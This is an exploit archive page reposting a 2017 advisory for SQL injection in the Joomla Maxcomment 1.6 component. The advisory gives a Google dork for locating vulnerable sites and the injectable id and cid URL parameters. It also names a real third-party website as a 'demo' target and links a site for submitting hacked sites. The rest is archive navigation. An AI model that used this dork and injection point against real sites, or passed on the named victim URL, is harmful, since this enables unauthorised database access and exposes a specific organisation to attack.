Joomla Maxcomment 1.6 SQL Injection

Joomla Maxcomment 1.6 SQL Injection: Posted Feb 20, 2017; Authored by Song-Dl Team; Joomla Maxcomment component version 1.6 suffer from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 38cfed519790c3a026d86e37e1408cd266a1d57caba956d1513fd6c72b246436; Download | Favorite | View

Joomla Maxcomment 1.6 SQL Injection

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#                Iranian Exploit DataBase

# Joomla Component com_maxcomment Sql Injection Vulnerability

# Google Dork: inurl:index.php?option=com_maxcomment

# Date : 19/2/2017

# version : 1.6

# Category: Webapps

# Tested on: Windows

# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)

# Site : IeDb.Ir  -  irist.ir   -   xssed.Ir

# Iedb Telegram : https://telegram.me/iedbteam

# Archive Exploit = http://iedb.ir/exploits-6897.html

#####################################

Bug :

http://localhost/[PATH]/index.php?option=com_maxcomment&task=report&id=[sql]&cid=[sql]&Itemid=1

Demo :

http://www.chilevision.cl/home/index.php?option=com_maxcomment&task=report&id=385201&cid=310451&Itemid=2834

#####################################

** http://iedb.ir  ==>> Iranian Exploit DataBase And Iranian Security Team

** http://irist.ir  ==>> submit hacked sites

** http://xssed.Ir  ==>>  Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)

Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,

Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team

#####################################

#  Archive Exploit = http://iedb.ir/exploits-6897.html

#####################################

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 64 files
Debian 22 files
Gentoo 8 files
Google Security Research 7 files
LiquidWorm 6 files
Apple 5 files
Jann Horn 3 files
Spencer McIntyre 3 files
Milad Karimi 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,175)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,140)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,480)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,022)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Joomla Maxcomment 1.6 SQL Injection

Joomla Maxcomment 1.6 SQL Injection

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Joomla Maxcomment 1.6 SQL Injection

Share This

Joomla Maxcomment 1.6 SQL Injection

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems